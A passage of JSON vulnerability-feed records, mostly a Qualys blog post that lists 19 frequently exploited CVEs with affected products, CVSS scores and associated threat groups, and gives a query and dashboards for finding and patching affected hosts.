Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2020-03-19T20:48:06", "published": "2020-03-19T20:48:06", "id": "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756", "href": "https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/", "type": "carbonblack", "title": "Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0158", "CVE-2012-0163", "CVE-2012-0151"], "description": "MSCOMCTL.ocx code execution, .Net code execution, WinVerifyTrust digital signature validation vulnerability", "edition": 1, "modified": "2012-04-23T00:00:00", "published": "2012-04-23T00:00:00", "id": "SECURITYVULNS:VULN:12320", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12320", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "qualysblog": [{"lastseen": "2019-12-27T19:32:53", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-0143", "CVE-2017-0199", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-5638", "CVE-2017-5715", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-10561", "CVE-2018-12130", "CVE-2018-20250", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-8174", "CVE-2019-0708", "CVE-2019-2725", "CVE-2019-3396"], "description": "[A recent report](<https://www.darkreading.com/threat-intelligence/20-vulnerabilities-to-prioritize-patching-before-2020/d/d-id/1336691>) identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.\n\nThe list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.\n\n**No.** | **CVE** | **Products Affected by CVE** | **CVSS Score (NVD)** | **Examples of Threat Actors** \n---|---|---|---|--- \n**1** | CVE-2017-11882 | Microsoft Office | 7.8 | APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia) \n**2** | CVE-2018-8174 | Microsoft Windows | 7.5 | Silent Group (Russia), Dark Hotel APT (North Korea) \n**3** | CVE-2017-0199 | Microsoft Office, Windows | 7.8 | APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Gorgon Group (Pakistan), Gaza Cybergang (Iran) \n**4** | CVE-2018-4878 | Adobe Flash Player, Red Hat Enterprise Linux | 9.8 | APT37 (North Korea), Lazarus Group (North Korea) \n**5** | CVE-2017-10271 | Oracle WebLogic Server | 7.5 | Rocke Gang (Chinese Cybercrime) \n**6** | CVE-2019-0708 | Microsoft Windows | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**7** | CVE-2017-5638 | Apache Struts | 10 | Lazarus Group (North Korea) \n**8** | CVE-2017-5715 | ARM, Intel | 5.6 | Unknown \n**9** | CVE-2017-8759 | Microsoft .net Framework | 7.8 | APT40 (China), Cobalt Group (Spain, Ukraine), APT10 (China) \n**10** | CVE-2018-20250 | RARLAB WinRAR | 7.8 | APT32 (Vietnam), APT33 (Iran), APT-C-27 (Iran), Lazarus Group (North Korea), MuddyWater APT (Iran) \n**11** | CVE-2018-7600 | Debian, Drupal | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru), Sea Turtle (Iran) \n**12** | CVE-2018-10561 | DASAN Networks | 9.8 | Kelvin SecTeam (Venezuela, Colombia, Peru) \n**13** | CVE-2012-0158 | Microsoft | N/A; 9.3* | APT28 (Russia), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Lotus Blossom (China), Goblin Panda (China), Gorgon Group (Pakistan), APT40 (China) \n**14** | CVE-2017-8570 | Microsoft Office | 7.8 | APT-C-35 (India), Cobalt Group (Spain, Ukraine), APT23 (China) \n**15** | CVE-2018-0802 | Microsoft Office | 7.8 | Cobalt Group (Spain, Ukraine), APT37 (North Korea), Silent Group (Russia), Cloud Atlas (Unknown), Cobalt Group (Spain, Ukraine), Goblin Panda (China), APT23 (China), APT27 (China), Rancor Group (China), Temp.Trident (China) \n**16** | CVE-2017-0143 | Microsoft SMB | 8.1 | APT3 (China), Calypso (China) \n**17** | CVE-2018-12130 | Fedora | 5.6 | Iron Tiger (China), APT3 (China), Calypso (China) \n**18** | CVE-2019-2725 | Oracle WebLogic Server | 9.8 | Panda (China) \n**19** | CVE-2019-3396 | Atlassian Confluence | 9.8 | APT41 (China), Rocke Gang (Chinese Cybercrime) \n \n* according to [cvedetails.com](<http://cvedetails.com/>)\n\n### Detecting the Top 19 CVEs\n\nQualys has detections (QIDs) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that cover authenticated and remotely detected vulnerabilities supported by Qualys scanners and [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\nTo return a list of all impacted hosts, use the following QQL query within the VM Dashboard:\n \n \n vulnerabilities.vulnerability.cveIds:[CVE-2017-11882, CVE-2018-8174, CVE-2017-0199, CVE-2018-4878, CVE-2017-10271, CVE-2019-0708, CVE-2017-5638, CVE-2017-5715, CVE-2017-8759, CVE-2018-20250, CVE-2018-7600, CVE-2018-10561, CVE-2012-0158, CVE-2017-8570, CVE-2018-0802, CVE-2017-0143, CVE-2018-12130, CVE-2019-2725, CVE-2019-3396]\n\nYou can [import the following dashboard to track all 19 CVEs](<https://discussions.qualys.com/docs/DOC-7032>) as shown in the template below:\n\n[](<https://discussions.qualys.com/docs/DOC-7032>)\n\n### Alerts\n\nThe Qualys Cloud Platform enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets.\n\nSee how to set up [notifications for new and updated QIDs](<https://www.qualys.com/docs/version/8.21/qualys-vulnerability-notification.pdf>).\n\n### Tracking Per-Year Environment Impact and Remediation\n\nThe Qualys visualization team has included a Per-Year Environment Insight View Dashboard for easy tracking and remediation. This dashboard has been included in release 2.42 and can be found within the dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking Qualys Cloud Agent.\n\n\n\nThis Per-Year Environment Insight View Dashboard will display data per year based on First Found date, followed by Vulnerability Status, Severity, Compliance, Real-Time Threat Intelligence (RTI)s from [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>), and Vulnerability Published Dates, allowing for an easy glance across your environment.\n\n\n\n \n\n### Get Started Now\n\nTo start detecting and remediating these vulnerabilities now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).\n\nVisit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download other dashboards created by your SMEs and Product Management team and import them into your subscription for further data insights.", "modified": "2019-12-27T18:01:22", "published": "2019-12-27T18:01:22", "id": "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "href": "https://blog.qualys.com/technology/2019/12/27/top-19-vulnerability-cves-in-santas-dashboard-tracking", "type": "qualysblog", "title": "Top 19+ Vulnerability CVEs in Santa\u2019s Dashboard Tracking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
